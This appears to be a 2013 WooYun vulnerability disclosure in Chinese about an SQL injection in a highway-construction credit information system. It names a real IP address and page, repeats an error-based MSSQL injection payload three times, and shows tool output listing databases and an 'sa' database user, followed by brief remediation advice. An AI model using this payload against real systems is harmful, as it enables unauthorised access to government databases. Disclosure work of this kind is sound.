漏洞概要 关注数(24) 关注此漏洞
>
漏洞详情
披露状态:
2013-06-26: 细节已通知厂商并且等待厂商处理中
2013-06-30: 厂商已经确认,细节仅向厂商公开
2013-07-10: 细节向核心白帽子及相关领域专家公开
2013-07-20: 细节向普通白帽子公开
2013-07-30: 细节向实习白帽子公开
2013-08-10: 细节向公众公开
简要描述:
都不好意思提交了,怎么全国的都有问题,我为公路交通信息的安全事业做出了贡献。
详细说明:
详细说明见以前提交的两个公路建设市场信用信息管理系统SQL注入
问题页面:
http://202.100.241.36:808/forui/policy/showpolicy.aspx
变量:ID
Place: GET
Parameter: ID
Type: error-based
Title: Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause
Payload: ID=10' AND 8168=CONVERT(INT,(CHAR(58)+CHAR(111)+CHAR(122)+CHAR(121)+CHAR(58)+(SELECT (CASE WHEN (8168=8168) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(58)+CHAR(122)+CHAR(101)+CHAR(116)+CHAR(58))) AND 'FMNC'='FMNC
---
lace: GET
Parameter: ID
Type: error-based
Title: Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause
Payload: ID=10' AND 8168=CONVERT(INT,(CHAR(58)+CHAR(111)+CHAR(122)+CHAR(121)+CHAR(58)+(SELECT (CASE WHEN (8168=8168) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(58)+CHAR(122)+CHAR(101)+CHAR(116)+CHAR(58))) AND 'FMNC'='FMNC
---
available databases [10]:
[*] hain_temp
[*] master
[*] model
[*] msdb
[*] ot_hs_hain
[*] ot_hs_hain0710
[*] ReportServer
[*] ReportServerTempDB
[*] tempdb
[09:24:16] [INFO] fetching tables for database: msdb
[09:24:17] [INFO] the SQL query used returns 219 entries
漏洞证明:
Place: GET
Parameter: ID
Type: error-based
Title: Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause
Payload: ID=10' AND 8168=CONVERT(INT,(CHAR(58)+CHAR(111)+CHAR(122)+CHAR(121)+CHAR(58)+(SELECT (CASE WHEN (8168=8168) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(58)+CHAR(122)+CHAR(101)+CHAR(116)+CHAR(58))) AND 'FMNC'='FMNC
---
current user: 'sa'当前数据库名为默认的sa
修复方案:
从过滤、变量参数化、存储过程入手,哪个都可以解决
版权声明:转载请注明来源 霍大然@乌云
>
漏洞回应
厂商回应:
危害等级:中
漏洞Rank:10
确认时间:2013-06-30 22:21
厂商回复:
最新状态:
暂无